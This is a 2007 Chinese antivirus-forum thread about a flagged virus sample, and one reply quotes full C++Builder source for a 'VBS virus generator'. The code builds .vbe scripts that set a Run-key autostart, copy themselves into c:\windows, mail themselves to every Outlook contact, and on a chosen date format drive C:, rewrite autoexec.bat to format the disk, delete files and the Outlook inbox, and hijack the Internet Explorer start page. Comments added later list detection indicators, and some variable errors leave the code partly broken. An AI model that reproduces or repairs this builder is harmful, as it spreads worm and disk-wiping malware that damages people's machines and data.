楼主: 欠妳緈諨

[病毒样本] 3f031f,NOD启发!

tracydk
发表于 2007-9-14 07:52:28 | 显示全部楼层
原帖由 jhtl 于 2007-9-14 00:17 发表
是病毒,不是误报啊

运行过了再说话。。。。
luyu918
发表于 2007-9-14 07:59:02 | 显示全部楼层
驱逐舰过!!
费尔过!!
jhtl
发表于 2007-9-14 08:28:44 | 显示全部楼层
样本本身不是exe,而是一个网页,几款杀软都报恶意脚本,应该不是误报。如果是误报,那可能是因为网页正文里贴出了下面这段代码的文本而被检测到:
[转载]VBS病毒生成器核心源代码 此程序可以生成病毒   [ 日期:2007-03-24 ]   [ 来自:本站原创 ]
信息来源:邪恶八进制信息安全团队
该程序来源于网络上,是我们收集来供大家研究交流,根据作者说:
程序经过加壳压缩后仅200来K,但由于窗口文件较多,所以文件比较杂乱,所以把核心文件整理出来,供大家参考。其中注册功能未公开实属无奈之举,有看不懂的问题可以向zsy2@citiz.net来信询问。
以下程序在windows ME用C++Builder5.0编译通过。欢迎和高手一起探讨开发,不得将下列代码在媒体发表。
 
unit1.cpp
//-----------------------------------------
#include
#include
#include
#pragma hdrstop
#include "Unit2.h"
#include "Unit3.h"
#include "Unit1.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
// Global pointer to the main form instance. It is only declared here; nothing
// in this listing assigns it.
Tform1 *form1;
//---------------------------------------------------------------------------
/// Constructs the main form. All work is delegated to the Tform base
/// constructor; the body itself does nothing.
__fastcall Tform1::Tform1(TComponent* Owner)
    : Tform(Owner)
{
    // Intentionally empty.
}
//---------------------------------------------------------------------------

//---------------------------------------------------------------------------
/// Click handler for Label1: hands a fixed URL to the shell.
void __fastcall Tform1::Label1Click(TObject *Sender)
{
    const char *target = "http://zsyangel.yeah.net";

    // A NULL verb lets the shell pick its default action for the target.
    ShellExecute(Handle, NULL, target, NULL, NULL, SW_SHOWNORMAL);
}
//---------------------------------------------------------------------------

//--------------------------------------------------------

/// Click handler for CheckBox3: enables or disables the three edit boxes
/// Edit8, Edit9 and Edit10 together and recolours them to match.
void __fastcall Tform1::CheckBox3Click(TObject *Sender)
{
    const bool active = (CheckBox3->Checked == true);

    // Enabled boxes use the highlight-text colour, disabled ones the button-face colour.
    Edit8->Enabled = active;
    Edit8->Color = active ? clHighlightText : clBtnFace;

    Edit9->Enabled = active;
    Edit9->Color = active ? clHighlightText : clBtnFace;

    Edit10->Enabled = active;
    Edit10->Color = active ? clHighlightText : clBtnFace;
}
//--------下面数行用来限制按键,防止无效数据造成溢出-------------------------------------------------------------------

/// Click handler for CheckBox4: flips the enabled state of Edit4.
/// The handler looks at Edit4's current state, not at the checkbox value.
void __fastcall Tform1::CheckBox4Click(TObject *Sender)
{
    const bool wasEnabled = (Edit4->Enabled == true);
    Edit4->Enabled = !wasEnabled;
}
//---------------------------------------------------------------------------

//---------------------------------------------------------------------------

/// Key filter for Edit4: lets through the character codes 48..57 (ASCII
/// digits), 8 (backspace) and 13 (carriage return), and clears Key for
/// everything else.
void __fastcall Tform1::Edit4KeyPress(TObject *Sender, char &Key)
{
    const bool isDigit = (Key >= 48 && Key <= 57);
    const bool isEditingKey = (Key == 8 || Key == 13);
    if (isDigit || isEditingKey)
        return;

    Key = NULL;
}
//---------------------------------------------------------------------------
/// Key filter for Edit8: lets through the character codes 48..57 (ASCII
/// digits), 8 (backspace) and 13 (carriage return), and clears Key for
/// everything else.
void __fastcall Tform1::Edit8KeyPress(TObject *Sender, char &Key)
{
    const bool isDigit = (Key >= 48 && Key <= 57);
    const bool isEditingKey = (Key == 8 || Key == 13);
    if (isDigit || isEditingKey)
        return;

    Key = NULL;
}
//---------------------------------------------------------------------------
/// Key filter for Edit9: lets through the character codes 48..57 (ASCII
/// digits), 8 (backspace) and 13 (carriage return), and clears Key for
/// everything else.
void __fastcall Tform1::Edit9KeyPress(TObject *Sender, char &Key)
{
    const bool isDigit = (Key >= 48 && Key <= 57);
    const bool isEditingKey = (Key == 8 || Key == 13);
    if (isDigit || isEditingKey)
        return;

    Key = NULL;
}
//---------------------------------------------------------------------------
/// Key filter for Edit10: lets through the character codes 48..57 (ASCII
/// digits), 8 (backspace) and 13 (carriage return), and clears Key for
/// everything else.
void __fastcall Tform1::Edit10KeyPress(TObject *Sender, char &Key)
{
    const bool isDigit = (Key >= 48 && Key <= 57);
    const bool isEditingKey = (Key == 8 || Key == 13);
    if (isDigit || isEditingKey)
        return;

    Key = NULL;
}
//---------------------------------------------------------------------------
/// Key filter for Edit5: lets through the character codes 48..57 (ASCII
/// digits), 8 (backspace) and 13 (carriage return), and clears Key for
/// everything else.
void __fastcall Tform1::Edit5KeyPress(TObject *Sender, char &Key)
{
    const bool isDigit = (Key >= 48 && Key <= 57);
    const bool isEditingKey = (Key == 8 || Key == 13);
    if (isDigit || isEditingKey)
        return;

    Key = NULL;
}
//---------------------------------------------------------------------------

/// Focus-leave handler for Edit4: accepts values 1..10000; anything else
/// shows a message box and blanks the field.
void __fastcall Tform1::Edit4Exit(TObject *Sender)
{
    const AnsiString entered = Edit4->Text;
    // StrToInt raises a conversion exception on text that is not an integer.
    const int value = StrToInt(entered);

    if (value >= 1 && value <= 10000)
        return;

    ShowMessage("超出范围,请不要添太大或太小");
    Edit4->Text = "";
}
//---------------------------------------------------------------------------

/// Focus-leave handler for Edit8: accepts values 1982..2050; anything else
/// shows a message box and resets the field to "2001".
void __fastcall Tform1::Edit8Exit(TObject *Sender)
{
    const AnsiString entered = Edit8->Text;
    // StrToInt raises a conversion exception on text that is not an integer.
    const int value = StrToInt(entered);

    if (value >= 1982 && value <= 2050)
        return;

    ShowMessage("超出范围,请不要添太大或太小");
    Edit8->Text = "2001";
}
//---------------------------------------------------------------------------
/// Focus-leave handler for Edit9: accepts values 1..12; anything else shows
/// a message box and resets the field to "1".
void __fastcall Tform1::Edit9Exit(TObject *Sender)
{
    const AnsiString entered = Edit9->Text;
    // StrToInt raises a conversion exception on text that is not an integer.
    const int value = StrToInt(entered);

    if (value >= 1 && value <= 12)
        return;

    ShowMessage("超出范围,请不要添太大或太小");
    Edit9->Text = "1";
}
//---------------------------------------------------------------------------
/// Focus-leave handler for Edit10: accepts values 1..31; anything else shows
/// a message box and resets the field to "1".
void __fastcall Tform1::Edit10Exit(TObject *Sender)
{
    const AnsiString entered = Edit10->Text;
    // StrToInt raises a conversion exception on text that is not an integer.
    const int value = StrToInt(entered);

    if (value >= 1 && value <= 31)
        return;

    ShowMessage("超出范围,请不要添太大或太小");
    Edit10->Text = "1";
}
//---------------------------------------------------------------------------

//---------------主要代码------------------------------------------------------------

// First step of the generator: creates "<Edit1 text>.vbe" and writes the first
// lines of script text into it. The handle is kept in `i`, which is not
// declared anywhere in this listing (presumably a member or global) and stays
// open until BitBtn4Click calls FileClose.
//
// Defender note: when CheckBox1 is ticked, the text written below contains two
// fixed artefacts that are visible as string literals here: an autostart value
// named "kv3000" under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run,
// and a script copy under c:\windows with the operator-chosen base name and a
// .vbe extension. Both are usable as host indicators for output of this tool.
void __fastcall Tform1::BitBtn1Click(TObject *Sender)
{
AnsiString g=Edit1->Text+".vbe";// creates the VBE file in the current directory
i=FileCreate(g );
// Header line: a fixed "Created by" prefix followed by the Edit2 text.
AnsiString a1=""Created by " ;
AnsiString a=Edit2->Text;
AnsiString b="\r\n";
AnsiString z=a1+a+b;
char c[1000];
strcpy(c, z.c_str());
FileWrite(i,c,strlen(c));
if (CheckBox1->Checked==true)// optional: have the generated script write a registry entry
{AnsiString a3=" Dim wsh\r\n Set wsh=CreateObject(\"WScript.Shell\")\r\n on error resume next \r\n wsh.regwrite \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\kv3000\",\"c:\\windows\\";
AnsiString a31=Edit1->Text;
AnsiString a32=".vbe\"\r\n";
AnsiString a33="Set fso= Createobject\(\"Scripting.FileSystemObject\"\)\r\nSet InF=fso.OpenTextFile\(WScript.ScriptFullname,1\)\r\nDo While InF.AtEndOfStream<>True\r\nScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf \r\nLoop\r\nSet OutF=fso.OpenTextFile\(\"c:\\windows\\";
AnsiString a34=Edit1->Text;
AnsiString a35=".vbe\",2,true\)\r\nOutF.write ScriptBuffer\r\n ";
AnsiString a4=a3+a31+a32+a33+a34+a35;
char c1[10000];
strcpy(c1, a4.c_str());
FileWrite(i,c1,strlen(c1));
}
// Move the wizard on: show TabSheet1 and lock TabSheet0.
TabSheet1->Enabled=true;
TabSheet1->Show() ;
TabSheet0->Enabled=false;
}
//---------------------------------------------------------------------------
/// Click handler for Label4: asks the shell to open a fixed mailto: link.
void __fastcall Tform1::Label4Click(TObject *Sender)
{
    const char *verb = "open";
    const char *target = "mailto:zsy2@citiz.net";

    ShellExecute(Handle, verb, target, NULL, NULL, SW_SHOW);
}
//---------------------------------------------------------------------------
// Second step of the generator: appends the e-mail routine to the file opened
// in BitBtn1Click (handle `i`). Subject and body come from Edit11 and Edit13;
// the loop bound is either the literal "ContactCount" (CheckBox4 ticked) or the
// number typed into Edit4.
//
// Defender note: the literals below show what to look for on a host or mail
// gateway. The emitted script drives Outlook.Application from a script host,
// attaches a .vbe file from c:\windows, and uses the registry value
// HKCU\software\a\a set to "1" as its already-ran marker. A script host
// automating Outlook to send mail and that marker value are both detectable.
void __fastcall Tform1::BitBtn2Click(TObject *Sender)// these lines emit the routine that spreads the script through Outlook
{
AnsiString bb="if wsh.regread \(\"HKCU\\software\\a\\a\"\)<> \"1\" then out\r\nsub out\r\n";
AnsiString b1="On Error Resume Next\r\n";
AnsiString b2="Set Outlook = CreateObject(\"Outlook.Application\")\r\nIf Outlook = \"Outlook\" Then\r\nSet Mapi=Outlook.GetNameSpace(\"MAPI\")\r\nSet Lists=Mapi.AddressLists\r\nFor Each ListIndex In Lists\r\nIf ListIndex.AddressEntries.Count <> 0 Then\r\nContactCount = ListIndex.AddressEntries.Count\r\nFor Count= 1 To ";
AnsiString b9="ContactCount";
AnsiString b7= Edit4->Text;
AnsiString b8="\r\nSet Mail = Outlook.CreateItem(0)\r\nSet Contact = ListIndex.AddressEntries(Count)\r\nMail.To = Contact.Address\r\nMail.Subject = \"";
AnsiString b3=Edit11->Text;
AnsiString b4="\"\r\nMail.Body = \"" ;
AnsiString b5=Edit13->Text;
AnsiString b6="\"\r\nSet Attachment=Mail.Attachments\r\n Attachment.Add Folder & \" c:\\windows\\";
AnsiString bb1=Edit1->Text;
AnsiString bb2=".vbe\"\r\nMail.Send\r\nnext\r\n End if\r\nnext\r\n End if\r\nend sub\r\nwsh.regwrite \"HKCU\\software\\a\\a\", \"1\"\r\n";
// The two branches differ only in the loop bound: b9 versus b7.
if (CheckBox4->Checked==true)
{
AnsiString B=bb+b1+b2+b9+b8+b3+b4+b5+b6+bb1+bb2;
char b[10000];
strcpy(b, B.c_str());
FileWrite(i,b,strlen(b));
}
else
{AnsiString B=bb+b1+b2+b7+b8+b3+b4+b5+b6+bb1+bb2;
char b[10000];
strcpy(b, B.c_str());
FileWrite(i,b,strlen(b));}

// Move the wizard on: show TabSheet2 and lock TabSheet1.
TabSheet2->Enabled=true;
TabSheet2->Show() ;
TabSheet1->Enabled=false;
}
//------------------------此下代码负责破坏功能---------------------------------------------------
// Third step of the generator: appends the destructive section to the file
// behind handle `i`. CheckBox3 selects whether a date condition (Edit8, Edit9,
// Edit10) wraps the section; CheckBox2, CheckBox5 and CheckBox6 each add one
// fixed text fragment; Edit6 supplies the path given to fso.DeleteFile.
//
// Defender note: every fragment is a literal in this listing, so output of this
// tool carries stable strings to match on: a "format c:" command line with the
// /q /autotest /u switches launched through start.exe, a rewrite of
// c:\autoexec.bat containing the same command, and a loop that deletes the
// items of Outlook default folder 6 (the Inbox in the Outlook object model).
void __fastcall Tform1::BitBtn3Click(TObject *Sender)
{
TabSheet3->Enabled=true;
TabSheet3->Show() ;
if (CheckBox3->Checked==true)
{{AnsiString d1=" \r\nif year(date)&month(date)&day(date)= ";// sets the date on which the payload triggers
AnsiString dyear=Edit8->Text;
AnsiString dmon_th=Edit9->Text;
AnsiString dday=Edit10->Text;
AnsiString dthen=" Then a\r\n" ;
AnsiString sub="sub a\r\n" ;
AnsiString dex=d1+dyear+dmonth+dday+dthen+sub;
char d[10000];
strcpy(d, dex.c_str());
FileWrite(i,d,strlen(d)); }
AnsiString del="on error resume next\r\nfso.DeleteFile\(\"";// deletes the file named in Edit6
AnsiString delf=Edit6->Text;
AnsiString delf1="\"\)\r\n";
AnsiString def=del+delf+delf1;
char d[10000];
strcpy(d, def.c_str());
FileWrite(i,d,strlen(d));
if(CheckBox2->Checked==true)// formats the hard disk
{AnsiString df1="\r\n set WshShell = Wscript.CreateObject\(\"WScript.Shell\"\) \r\nWshShell.Run\ (\"start.exe \/m format c:\/q\ /autotest\ /u\" \)\r\n ";
char df[10000];
strcpy(df, df1.c_str());
FileWrite(i,df,strlen(df)); }
// CheckBox5: fragment that writes c:\autoexec.bat.
if(CheckBox5->Checked==true)
{AnsiString df2="Set Script = fso.CreateTextFile\( \"c:\\autoexec.bat\", True\) \r\nScript.writeline \"format c:\/q\ /autotest\ /u\" \r\n ";
char df3[10000];
strcpy(df3, df2.c_str());
FileWrite(i,df3,strlen(df3)); }
// CheckBox6: fragment that deletes the items of Outlook default folder 6.
if(CheckBox6->Checked==true)
{AnsiString dem="Set Outlook=CreateObject\(\"Outlook.Application\"\)\r\nSet t=s.GetNameSpace\(\"MAPI\"\)\r\nSet u=t.GetDefaultFolder\(6\)\r\nFor i=1 to u.items.count\r\nu.Items.Item\(i\).delete\r\nnext\r\n";
char dm[10000];
strcpy(dm, dem.c_str());
FileWrite(i,dm,strlen(dm));}
char endsub[]="end sub\r\n";
FileWrite(i,endsub,strlen(endsub));
}
else
// No date condition: the CheckBox2 and CheckBox5 fragments are written without the sub wrapper.
{if(CheckBox2->Checked==true)
{AnsiString df1="set WshShell = Wscript.CreateObject\(\"WScript.Shell\"\)\r\nWshShell.Run\ (\"start.exe \/m format c:\/q\ /autotest\ /u\" \)\r\n";
char df[10000];
strcpy(df, df1.c_str());
FileWrite(i,df,strlen(df)); }
if(CheckBox5->Checked==true)
{AnsiString df2="on error resume next\r\nfso.DeleteFile\(\"c:\\autoexec.bat\")\r\n\Set Script = fso.CreateTextFile\( \"c:\\autoexec.bat\", True\)\r\nScript.writeline \"format c:\/q\ /autotest\ /u\"\r\n";
char df3[10000];
strcpy(df3, df2.c_str());
FileWrite(i,df3,strlen(df3)); }}
AnsiString del="on error resume next\r\nfso.DeleteFile\(\"";
AnsiString delf=Edit6->Text;
AnsiString delf1="\"\)\r\n";
AnsiString def=del+delf+delf1;
char d[10000];
strcpy(d, def.c_str());
FileWrite(i,d,strlen(d));
if(CheckBox6->Checked==true)
{AnsiString dem="Set Outlook=CreateObject\(\"Outlook.Application\"\)\r\nSet t=s.GetNameSpace\(\"MAPI\"\)\r\nSet u=t.GetDefaultFolder\(6\)\r\nFor i=1 to u.items.count\r\nu.Items.Item\(i\).delete\r\nnext\r\n";
char dm[10000];
strcpy(dm, dem.c_str());
FileWrite(i,dm,strlen(dm));}
// Lock TabSheet2 now that this step is done.
TabSheet2->Enabled=false;
}
//---------------------------------------------------------------------------
// Final step of the generator: appends two wsh.regwrite lines built from Edit3
// and Edit7, closes the output file and tells the operator it was saved.
//
// Defender note: the registry paths are literals here, so changes to
// "Start Page" and "Window title" under
// HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main made by a
// script host are an indicator for output of this tool.
void __fastcall Tform1::BitBtn4Click(TObject *Sender)// changes the IE window title and start page
{
AnsiString reg="wsh.regwrite \"HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page\",\"" ;
AnsiString reg1=Edit3->Text;
AnsiString reg2="\"\r\nwsh.regwrite\"HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Internet Explorer\\Main\\Window title\",\"";
AnsiString reg3=Edit7->Text;
AnsiString reg4="\"\r\n";
AnsiString reg5=reg+reg1+reg2+reg3+reg4+reg5;
char REG[10000];
strcpy(REG, reg5.c_str());
FileWrite(i,REG,strlen(REG));
TabSheet3->Enabled=false;
// The message text says the generated code was saved in the current directory.
ShowMessage("你的程序代码已保存在当前目录下");
// Closes the handle that BitBtn1Click opened.
FileClose(i);
}
//---------------------------------------------------------------------------

//注册功能暂不公开,敬请原谅……
//---------------------------------------------------------------------------

/// Close handler for the main form: closes form2 as well.
/// The Action argument is left untouched.
void __fastcall Tform1::formClose(TObject *Sender, TCloseAction &Action)
{
    form2->Close();
}
//---------------------------------------------------------------------------
/// Activation handler for the main form: hides form2.
void __fastcall Tform1::formActivate(TObject *Sender)
{
    form2->Hide();
}
//---------------------------------------------------------------------------

/// Click handler for BitBtn5: deletes "<Edit1 text>.vbe" and re-enables
/// TabSheet0.
void __fastcall Tform1::BitBtn5Click(TObject *Sender)
{
    const AnsiString outputName = Edit1->Text + ".vbe";
    DeleteFile(outputName);

    TabSheet0->Enabled = true;
}
//---------------------------------------------------------------------------

/// Click handler for Button1: shows form3.
void __fastcall Tform1::Button1Click(TObject *Sender)
{
    form3->Show();
}
//---------------------------------------------------------------------------

/// Context-popup handler for TabSheet0. The body is empty, so MousePos and
/// Handled are left as they were passed in.
void __fastcall Tform1::TabSheet0ContextPopup(TObject *Sender,
                                              TPoint &MousePos,
                                              bool &Handled)
{
    // Intentionally empty.
}
unit1.h
 
#ifndef Unit1H
#define Unit1H
//---------------------------------------------------------------------------
#include
#include
#include
#include
#include
#include
#include
#include
//---------------------------------------------------------------------------
class Tform1 : public Tform
{
__published: // IDE-managed Components
TPageControl *b;
TTabSheet *TabSheet2;
TTabSheet *TabSheet3;
TTabSheet *TabSheet4;
TGroupBox *GroupBox1;
TLabel *Label1;
TMemo *Memo1;
TCheckBox *CheckBox1;
TEdit *Edit1;
